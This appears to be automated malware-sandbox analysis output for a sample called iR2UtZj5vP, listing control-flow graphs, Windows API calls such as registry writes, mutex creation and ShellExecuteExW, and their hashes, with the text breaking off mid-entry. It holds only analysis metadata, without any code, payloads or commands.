                                                                        control_flow_graph 0 4d30278-4d302a6 1 4d302a8 call 4d30c10 0->1 2 4d302ae-4d302bc 0->2 1->2 3 4d302c2-4d30305 2->3 4 4d303d8-4d303ec 2->4 22 4d303b9-4d303d2 3->22 7 4d303f2-4d3046b 4->7 8 4d30475-4d304c8 4->8 7->8 20 4d304ca 8->20 21 4d304cf 8->21 20->21 67 4d304cf call b005e0 21->67 68 4d304cf call b00606 21->68 69 4d304cf call 4d30cd8 21->69 70 4d304cf call 4d30cbe 21->70 22->4 23 4d3030a-4d30316 22->23 25 4d30bbd 23->25 26 4d3031c-4d3034d 23->26 24 4d304d5-4d304e9 27 4d30520-4d30677 24->27 28 4d304eb-4d30515 24->28 30 4d30bc2-4d30c05 25->30 38 4d30390-4d303b3 26->38 39 4d3034f-4d30385 26->39 59 4d306ff-4d30bb8 27->59 60 4d3067d-4d306bb 27->60 28->27 38->22 38->30 39->38 60->59 67->24 68->24 69->24 70->24
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1428220836.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_4d30000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 2k$2k
                                                                        • API String ID: 0-107389494
                                                                        • Opcode ID: 753db121a637ea87e48f5a14f5d73b638999c270506ab29f1bce3903bef3536c
                                                                        • Instruction ID: bc8aad94d7135e342c6878e3662bd3ba6e97b68039a3adf8c3907906e067bd01
                                                                        • Opcode Fuzzy Hash: 753db121a637ea87e48f5a14f5d73b638999c270506ab29f1bce3903bef3536c
                                                                        • Instruction Fuzzy Hash: A7B16930A01218CFDB25EF74C954BADB7F2AF45309F1084AAD449AB3A5DB399E85CF50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 71 4d30268-4d302a6 72 4d302a8 call 4d30c10 71->72 73 4d302ae-4d302bc 71->73 72->73 74 4d302c2-4d30305 73->74 75 4d303d8-4d303ec 73->75 93 4d303b9-4d303d2 74->93 78 4d303f2-4d3046b 75->78 79 4d30475-4d304c8 75->79 78->79 91 4d304ca 79->91 92 4d304cf 79->92 91->92 138 4d304cf call b005e0 92->138 139 4d304cf call b00606 92->139 140 4d304cf call 4d30cd8 92->140 141 4d304cf call 4d30cbe 92->141 93->75 94 4d3030a-4d30316 93->94 96 4d30bbd 94->96 97 4d3031c-4d3034d 94->97 95 4d304d5-4d304e9 98 4d30520-4d30677 95->98 99 4d304eb-4d30515 95->99 101 4d30bc2-4d30c05 96->101 109 4d30390-4d303b3 97->109 110 4d3034f-4d30385 97->110 130 4d306ff-4d30bb8 98->130 131 4d3067d-4d306bb 98->131 99->98 109->93 109->101 110->109 131->130 138->95 139->95 140->95 141->95
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1428220836.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_4d30000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 2k$2k
                                                                        • API String ID: 0-107389494
                                                                        • Opcode ID: a8b08b5a1ee1baab789096c8bf14e5196db00687108345d89234a302aef8cd6f
                                                                        • Instruction ID: d774a223641ef9c59bf4450805d6b8bca0debb5169a1f7fd8780adb87c3b0a54
                                                                        • Opcode Fuzzy Hash: a8b08b5a1ee1baab789096c8bf14e5196db00687108345d89234a302aef8cd6f
                                                                        • Instruction Fuzzy Hash: 3E816C70A01218CFDB15EF75C955BADB7B2AF44309F1080A9D409AB3A5DB399E85CF60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 142 4d30392-4d303ad 146 4d303af-4d303b3 142->146 147 4d30bc2-4d30c05 146->147 148 4d303b9-4d303d2 146->148 149 4d3030a-4d30316 148->149 150 4d303d8-4d303ec 148->150 151 4d30bbd 149->151 152 4d3031c-4d3034d 149->152 157 4d303f2-4d3046b 150->157 158 4d30475-4d304c8 150->158 151->147 163 4d30390 152->163 164 4d3034f-4d30385 152->164 157->158 171 4d304ca 158->171 172 4d304cf 158->172 163->146 164->163 171->172 203 4d304cf call b005e0 172->203 204 4d304cf call b00606 172->204 205 4d304cf call 4d30cd8 172->205 206 4d304cf call 4d30cbe 172->206 175 4d304d5-4d304e9 176 4d30520-4d30677 175->176 177 4d304eb-4d30515 175->177 196 4d306ff-4d30bb8 176->196 197 4d3067d-4d306bb 176->197 177->176 197->196 203->175 204->175 205->175 206->175
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1428220836.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_4d30000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 2k$2k
                                                                        • API String ID: 0-107389494
                                                                        • Opcode ID: 72d3a67e1277f5b798e0368ae41ae880f9336d4a33f5a8e0f42147749bbc8387
                                                                        • Instruction ID: db14dca99fc2ed9f453bdd2db7fd1270b46772c4ea3a4c4c02eeefb09c06b860
                                                                        • Opcode Fuzzy Hash: 72d3a67e1277f5b798e0368ae41ae880f9336d4a33f5a8e0f42147749bbc8387
                                                                        • Instruction Fuzzy Hash: 5C615D70A01218CFDB15EF75C945BECB7B2AF44309F1080E9D409AB6A5DB399E85CF60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 207 4d30429-4d304c8 218 4d304ca 207->218 219 4d304cf 207->219 218->219 248 4d304cf call b005e0 219->248 249 4d304cf call b00606 219->249 250 4d304cf call 4d30cd8 219->250 251 4d304cf call 4d30cbe 219->251 220 4d304d5-4d304e9 221 4d30520-4d30677 220->221 222 4d304eb-4d30515 220->222 241 4d306ff-4d30bb8 221->241 242 4d3067d-4d306bb 221->242 222->221 242->241 248->220 249->220 250->220 251->220
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1428220836.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_4d30000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 2k$2k
                                                                        • API String ID: 0-107389494
                                                                        • Opcode ID: 8ebb18f198ab4ff64e0419bddfc3fd78a1c74b8427ee393ae4d1c82469da85d8
                                                                        • Instruction ID: fe72941e3e7ed7e46941b3065475efd878398e0a9a92cb9e3d7c8d904ed23bba
                                                                        • Opcode Fuzzy Hash: 8ebb18f198ab4ff64e0419bddfc3fd78a1c74b8427ee393ae4d1c82469da85d8
                                                                        • Instruction Fuzzy Hash: 71514A30A012188FDB64EF75C955BECB7B2AF84308F5080E9D409AB694DB396E85CF61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 252 b8ae23-b8aeb2 256 b8aeb4 252->256 257 b8aeb7-b8aec3 252->257 256->257 258 b8aec8-b8aed1 257->258 259 b8aec5 257->259 260 b8af22-b8af27 258->260 261 b8aed3-b8aef7 CreateFileW 258->261 259->258 260->261 264 b8af29-b8af2e 261->264 265 b8aef9-b8af1f 261->265 264->265
                                                                        APIs
                                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 00B8AED9
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1424215161.0000000000B8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b8a000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: d5c1df4a8e7dda0ddc33ada7a022476bc1c8a6ef897a3c3f37b3bbce64c5189a
                                                                        • Instruction ID: f2d2468137e41ff592b3a923dff2a1642a50310fab267afe6d08d65bfc482adc
                                                                        • Opcode Fuzzy Hash: d5c1df4a8e7dda0ddc33ada7a022476bc1c8a6ef897a3c3f37b3bbce64c5189a
                                                                        • Instruction Fuzzy Hash: 9F31B2B15053406FE722CB25DD44B62BFE8EF06314F08449AE9859B662D375E909CB71
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 268 b8ab92-b8ac15 272 b8ac1a-b8ac23 268->272 273 b8ac17 268->273 274 b8ac28-b8ac31 272->274 275 b8ac25 272->275 273->272 276 b8ac82-b8ac87 274->276 277 b8ac33-b8ac57 CreateMutexW 274->277 275->274 276->277 280 b8ac89-b8ac8e 277->280 281 b8ac59-b8ac7f 277->281 280->281
                                                                        APIs
                                                                        • CreateMutexW.KERNELBASE(?,?), ref: 00B8AC39
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1424215161.0000000000B8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b8a000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: CreateMutex
                                                                        • String ID:
                                                                        • API String ID: 1964310414-0
                                                                        • Opcode ID: 12e9c790658fa1abdcae34e3e1d32f4dd13c436e495a0e283622ccb26306ed15
                                                                        • Instruction ID: c72fb09cbb55424906d780346e3c9c5ce6e880ed6fcf29b614c010a66af4e9cc
                                                                        • Opcode Fuzzy Hash: 12e9c790658fa1abdcae34e3e1d32f4dd13c436e495a0e283622ccb26306ed15
                                                                        • Instruction Fuzzy Hash: 813195B55093806FE711CB25DD45B96FFF8EF06314F0884DAE944CB292D375A909CB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 284 b8a361-b8a3cf 287 b8a3d1 284->287 288 b8a3d4-b8a3dd 284->288 287->288 289 b8a3df 288->289 290 b8a3e2-b8a3e8 288->290 289->290 291 b8a3ea 290->291 292 b8a3ed-b8a404 290->292 291->292 294 b8a43b-b8a440 292->294 295 b8a406-b8a419 RegQueryValueExW 292->295 294->295 296 b8a41b-b8a438 295->296 297 b8a442-b8a447 295->297 297->296
                                                                        APIs
                                                                        • RegQueryValueExW.KERNELBASE(?,00000E24,4C89FF0F,00000000,00000000,00000000,00000000), ref: 00B8A40C
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1424215161.0000000000B8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b8a000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: QueryValue
                                                                        • String ID:
                                                                        • API String ID: 3660427363-0
                                                                        • Opcode ID: 4031aa399edebb8032d903750a5251cae818a5fb538a8b7db5bcaee3927626f2
                                                                        • Instruction ID: 37356f59c2814bc99846e93237f7cc12dd3ece60200f3eddf312013730afa215
                                                                        • Opcode Fuzzy Hash: 4031aa399edebb8032d903750a5251cae818a5fb538a8b7db5bcaee3927626f2
                                                                        • Instruction Fuzzy Hash: F33164755057405FE721CF15DC84F92BBF8EF06710F0884DAE9459B6A2D364E909CB71
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 301 b8af30-b8afbd 305 b8afbf-b8afd2 GetFileType 301->305 306 b8aff2-b8aff7 301->306 307 b8aff9-b8affe 305->307 308 b8afd4-b8aff1 305->308 306->305 307->308
                                                                        APIs
                                                                        • GetFileType.KERNELBASE(?,00000E24,4C89FF0F,00000000,00000000,00000000,00000000), ref: 00B8AFC5
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1424215161.0000000000B8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b8a000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: FileType
                                                                        • String ID:
                                                                        • API String ID: 3081899298-0
                                                                        • Opcode ID: 7c7e6779960846235eb2610075b41abb5517c86432bf350257fc9690100a3542
                                                                        • Instruction ID: a652ad4f7d3206220e267b96f1915c289b4c925d41d6c0cf615ccf8c9daca9af
                                                                        • Opcode Fuzzy Hash: 7c7e6779960846235eb2610075b41abb5517c86432bf350257fc9690100a3542
                                                                        • Instruction Fuzzy Hash: 6D2128B54093806FE7128B15DC85BA2BFACEF07720F0980D6E9808B2A3D264A909C771
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 312 b8a462-b8a4c3 315 b8a4c8-b8a4d4 312->315 316 b8a4c5 312->316 317 b8a4d9-b8a4f0 315->317 318 b8a4d6 315->318 316->315 320 b8a4f2-b8a505 RegSetValueExW 317->320 321 b8a527-b8a52c 317->321 318->317 322 b8a52e-b8a533 320->322 323 b8a507-b8a524 320->323 321->320 322->323
                                                                        APIs
                                                                        • RegSetValueExW.KERNELBASE(?,00000E24,4C89FF0F,00000000,00000000,00000000,00000000), ref: 00B8A4F8
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1424215161.0000000000B8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b8a000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: Value
                                                                        • String ID:
                                                                        • API String ID: 3702945584-0
                                                                        • Opcode ID: 0e6125986c7244d14d64c4eb6f5bfc3627b74341e87f7eae0c0e897809e247ea
                                                                        • Instruction ID: f6a2a7899b792aaa17b1151dd15e9e7aae5ec4b5ea747b24893925143acc0bab
                                                                        • Opcode Fuzzy Hash: 0e6125986c7244d14d64c4eb6f5bfc3627b74341e87f7eae0c0e897809e247ea
                                                                        • Instruction Fuzzy Hash: D02181B25043806FE7228B11DD44FA7BFF8DF46710F08849AE9459B6A2D264E948C771
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 327 b8ae5a-b8aeb2 330 b8aeb4 327->330 331 b8aeb7-b8aec3 327->331 330->331 332 b8aec8-b8aed1 331->332 333 b8aec5 331->333 334 b8af22-b8af27 332->334 335 b8aed3-b8aedb CreateFileW 332->335 333->332 334->335 337 b8aee1-b8aef7 335->337 338 b8af29-b8af2e 337->338 339 b8aef9-b8af1f 337->339 338->339
                                                                        APIs
                                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 00B8AED9
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1424215161.0000000000B8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b8a000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: 6f77317016ca0f6a7d7fccafd740502c4903059cb46176fd4d79492ef3b77d19
                                                                        • Instruction ID: faa9a8091bf2d79553d80b9a8e3eed9541fcc20275d29b612e11e95023bd8067
                                                                        • Opcode Fuzzy Hash: 6f77317016ca0f6a7d7fccafd740502c4903059cb46176fd4d79492ef3b77d19
                                                                        • Instruction Fuzzy Hash: A72162B1500600AFE721DF65DD89B66FBE8EF08314F18889EE9459B751D375E808CB72
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 355 b8a67b-b8a6d5 357 b8a6da-b8a6e0 355->357 358 b8a6d7 355->358 359 b8a6e2 357->359 360 b8a6e5-b8a6ee 357->360 358->357 359->360 361 b8a6f0-b8a6f8 LookupPrivilegeValueW 360->361 362 b8a731-b8a736 360->362 363 b8a6fe-b8a710 361->363 362->361 365 b8a738-b8a73d 363->365 366 b8a712-b8a72e 363->366 365->366
                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 00B8A6F6
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1424215161.0000000000B8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b8a000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: fb6935309538a9da7f76f4b242daac47d721649e80a9ba64429803bc7adfeca7
                                                                        • Instruction ID: fec17ae98a61e095955a0c34384e798733233c2a4c6895d3cb425c6c95d82003
                                                                        • Opcode Fuzzy Hash: fb6935309538a9da7f76f4b242daac47d721649e80a9ba64429803bc7adfeca7
                                                                        • Instruction Fuzzy Hash: 512183755093805FE7128B65DC45B92BFF8EF06320F0D84DBE985CB2A3D224D908D762
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 368 b8abc6-b8ac15 371 b8ac1a-b8ac23 368->371 372 b8ac17 368->372 373 b8ac28-b8ac31 371->373 374 b8ac25 371->374 372->371 375 b8ac82-b8ac87 373->375 376 b8ac33-b8ac3b CreateMutexW 373->376 374->373 375->376 377 b8ac41-b8ac57 376->377 379 b8ac89-b8ac8e 377->379 380 b8ac59-b8ac7f 377->380 379->380
                                                                        APIs
                                                                        • CreateMutexW.KERNELBASE(?,?), ref: 00B8AC39
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1424215161.0000000000B8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b8a000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: CreateMutex
                                                                        • String ID:
                                                                        • API String ID: 1964310414-0
                                                                        • Opcode ID: b753557fbe3b532ac2dbf3a23673cfcb5d467741f32e98fa20840b4349f76371
                                                                        • Instruction ID: c97f39cc6f5317b14974aa44876325047a0317b6e98be4c1b8861c7c6f283a99
                                                                        • Opcode Fuzzy Hash: b753557fbe3b532ac2dbf3a23673cfcb5d467741f32e98fa20840b4349f76371
                                                                        • Instruction Fuzzy Hash: A2218071504200AFF710DF25DD89BA6FBE8EF04324F1484AAED458B751D775E908CB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 383 b8b0e2-b8b159 387 b8b15b-b8b17b WriteFile 383->387 388 b8b19d-b8b1a2 383->388 391 b8b17d-b8b19a 387->391 392 b8b1a4-b8b1a9 387->392 388->387 392->391
                                                                        APIs
                                                                        • WriteFile.KERNELBASE(?,00000E24,4C89FF0F,00000000,00000000,00000000,00000000), ref: 00B8B161
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1424215161.0000000000B8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b8a000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: FileWrite
                                                                        • String ID:
                                                                        • API String ID: 3934441357-0
                                                                        • Opcode ID: 471d1347a0eeb8df881d98d7701e6633c52f71ea8f0e9493240bf47c6c3b27c7
                                                                        • Instruction ID: 1fa88f6d5d7fd5970d27481de0053f9cb753ffeccdcdebe2361d5c44d2b6c13d
                                                                        • Opcode Fuzzy Hash: 471d1347a0eeb8df881d98d7701e6633c52f71ea8f0e9493240bf47c6c3b27c7
                                                                        • Instruction Fuzzy Hash: 45219271405380AFD722CF51DD48F96BFB8EF45714F08849AE9459B652D334A908CB75
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 395 b8a392-b8a3cf 397 b8a3d1 395->397 398 b8a3d4-b8a3dd 395->398 397->398 399 b8a3df 398->399 400 b8a3e2-b8a3e8 398->400 399->400 401 b8a3ea 400->401 402 b8a3ed-b8a404 400->402 401->402 404 b8a43b-b8a440 402->404 405 b8a406-b8a419 RegQueryValueExW 402->405 404->405 406 b8a41b-b8a438 405->406 407 b8a442-b8a447 405->407 407->406
                                                                        APIs
                                                                        • RegQueryValueExW.KERNELBASE(?,00000E24,4C89FF0F,00000000,00000000,00000000,00000000), ref: 00B8A40C
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1424215161.0000000000B8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b8a000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: QueryValue
                                                                        • String ID:
                                                                        • API String ID: 3660427363-0
                                                                        • Opcode ID: 94fb04e6bdb86b8f8d5a02218b917205a3360c539d559563b9d11e5369e2540c
                                                                        • Instruction ID: d742710e148d459fdc1e9c93a3656ab4594ff9e94e01c7526b3bd6c1dfd2b550
                                                                        • Opcode Fuzzy Hash: 94fb04e6bdb86b8f8d5a02218b917205a3360c539d559563b9d11e5369e2540c
                                                                        • Instruction Fuzzy Hash: DE218EB56002049FEB20DE15DD88FA6B7ECEF04710F08849AE9469B761D764E809CB76
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 00B8A9CC
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1424215161.0000000000B8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b8a000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
                                                                        • API String ID: 2591292051-0
                                                                        • Opcode ID: b915086b17301852b2f3ba582bf4a91eb2a281c506c09e4dff7e7c0f77d9cf3e
                                                                        • Instruction ID: b426dc0892c0fd21768e93bc2efc96a9fff090e275b93902a3c653c143590a13
                                                                        • Opcode Fuzzy Hash: b915086b17301852b2f3ba582bf4a91eb2a281c506c09e4dff7e7c0f77d9cf3e
                                                                        • Instruction Fuzzy Hash: AF21A1725093C05FDB128B25DD54A92BFB4EF07324F0984DBED858F6A3D274A908CB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • RegSetValueExW.KERNELBASE(?,00000E24,4C89FF0F,00000000,00000000,00000000,00000000), ref: 00B8A4F8
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1424215161.0000000000B8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b8a000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: Value
                                                                        • String ID:
                                                                        • API String ID: 3702945584-0
                                                                        • Opcode ID: 548d55c5962a7d3daff52ab5c6157bc8ca750e676099259d5ab45725c2577fe7
                                                                        • Instruction ID: 7ae8f2f1dc59faf83d7108f048f76c3a21cbfb58bcdeb87449cf8f9f7b6c5820
                                                                        • Opcode Fuzzy Hash: 548d55c5962a7d3daff52ab5c6157bc8ca750e676099259d5ab45725c2577fe7
                                                                        • Instruction Fuzzy Hash: 0911B1B2500600AFEB219E11DD48FA6BBECEF14710F08849AED459AB51D374E848CBB2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(?), ref: 00B8A330
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1424215161.0000000000B8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b8a000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode
                                                                        • String ID:
                                                                        • API String ID: 2340568224-0
                                                                        • Opcode ID: 85f8c3aadea1818e3762392112e1ed3daea60b09ca2261196823eb9d88f1b292
                                                                        • Instruction ID: fd6603b9474e315c942ad9794b76ca151b9f5cfd7be56621914e442917252f9d
                                                                        • Opcode Fuzzy Hash: 85f8c3aadea1818e3762392112e1ed3daea60b09ca2261196823eb9d88f1b292
                                                                        • Instruction Fuzzy Hash: CC212C7140D3C05FD7138B259C54A52BFB4DF47224F0D80DBDD858F2A3D269A808DB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • WriteFile.KERNELBASE(?,00000E24,4C89FF0F,00000000,00000000,00000000,00000000), ref: 00B8B161
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1424215161.0000000000B8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b8a000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: FileWrite
                                                                        • String ID:
                                                                        • API String ID: 3934441357-0
                                                                        • Opcode ID: 95eb34f6483a2e46bc12e9236c75b0d2025708fbaf9fb6ab45d0d7fa3a697bf8
                                                                        • Instruction ID: d6083e13cd869248f44f3ae30526861677e99c4b49b604c759b463a72877a7cf
                                                                        • Opcode Fuzzy Hash: 95eb34f6483a2e46bc12e9236c75b0d2025708fbaf9fb6ab45d0d7fa3a697bf8
                                                                        • Instruction Fuzzy Hash: 0111B272500200AFEB219F51DD8CFA6FBE8EF04724F04849AEE459B651D374A408CBB5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • ShellExecuteExW.SHELL32(?), ref: 00B8B360
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1424215161.0000000000B8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b8a000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: ExecuteShell
                                                                        • String ID:
                                                                        • API String ID: 587946157-0
                                                                        • Opcode ID: 191ff6ad890a76079beea9ba16b1adf80cc74a17d61db94c5af57d869f650a42
                                                                        • Instruction ID: d92e083256934767531fa0b95b9f96696590844b61339abd7adfdc7863d038f7
                                                                        • Opcode Fuzzy Hash: 191ff6ad890a76079beea9ba16b1adf80cc74a17d61db94c5af57d869f650a42
                                                                        • Instruction Fuzzy Hash: 811160755093809FD712CF25DD94B52BFE8DF46220F0884EBED45CB2A2D274A908CB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 00B8A6F6
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1424215161.0000000000B8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b8a000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: 1196ff106e1f6b960821d47be776ac7f939944b0773f2ca4b6737d61d02c8202
                                                                        • Instruction ID: 37d6ec1b92096742bb3897982d040f59fda12cd14f0797034cd87ffb90f861ca
                                                                        • Opcode Fuzzy Hash: 1196ff106e1f6b960821d47be776ac7f939944b0773f2ca4b6737d61d02c8202
                                                                        • Instruction Fuzzy Hash: EB11A5756002008FEB10DF15D988756FBE8EF04320F0884AADD05CB755E374D804DB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetFileType.KERNELBASE(?,00000E24,4C89FF0F,00000000,00000000,00000000,00000000), ref: 00B8AFC5
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1424215161.0000000000B8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b8a000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: FileType
                                                                        • String ID:
                                                                        • API String ID: 3081899298-0
                                                                        • Opcode ID: 5c1edfd9e65042951f7138fc992575df045ffbe94245221e5f97b82a9add3eb3
                                                                        • Instruction ID: 19f27fa4bf8aede2917d3efb706157101ad3919c8cf3ebb48b130159eebf8de4
